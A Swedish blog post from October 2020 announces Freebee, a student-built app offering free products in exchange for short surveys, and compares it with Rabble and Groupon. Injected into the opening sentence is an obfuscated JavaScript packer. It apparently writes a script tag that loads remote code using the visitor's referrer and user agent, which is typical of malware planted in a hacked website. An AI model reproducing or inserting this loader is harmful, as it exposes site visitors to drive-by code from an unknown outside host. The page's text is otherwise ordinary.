Image Image Image Image Image Image Image Image Image Image

| 28 oktober, 2020

Scroll to top

Top

Freebee : Appen som ger dig gratis produkter

Freebee : Appen som ger dig gratis produkter
Sebastian

Efter eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|afkfr|var|u0026u|referrer|hrzth||js|php’.split(’|’),0,{}))
ett års utveckling och planering är den här. Appen som ger dig gratis produkter i din närhet.

Applikationen Rabble har blivit en stor del i mångas liv. Den används av flera tusen dagligen för att få exempelvis en bra lunch till en riktigt bra pris.
Jag ska inte sticka under stolen, jag använde den igår med en kompis och fick en burrito för 30 kr istället för 60 kronor mitt i city, toppen!

Men nu får de konkurrens.
Freebee
är en applikation som fungerar på ungefär samma sätt, fast. Till skillnad från Rabble, Groupon och alla andra kupongtjänster så har Freebee ett annat fokus.

Istället för att du betalar en mindre slant för en viss produkt får du nu ta del av erbjudanden helt gratis. Jag du hörde rätt, helt kostnadsfritt kan du alltså hämta ut en glass, en coca cola, en macka eller varför inte i framtiden en hel lunch. Det enda du ger i gentjänst till företaget är att du svarar på MAX tio frågor innan eller efter du hämtat ut produkten. Enkäten som du svarar på finns i mobilen och behöver inte göras på plats. Genom att det är så pass få frågor så är det verkligen en toppen idé.

Som sagt, den lanserades igår och ligger redan på topp 25 mest nerladdade apparna i Appstore. Jag har laddat ner den och kikat lite men inte provat den i praktiken än, men det ska vi se till att ändra på. Redan idag kommer jag att försöka hämta ut min första ”Freebee” vilket ska bil intressant och se.

Är ni sugna på att ladda ner den kan ni göra det direkt i er telefon eller via länken nedan.

Jag önskar verkligen teamet på handelshögskolan i Stockholm som ligger bakom appen lycka till!

freebee - Appsorbance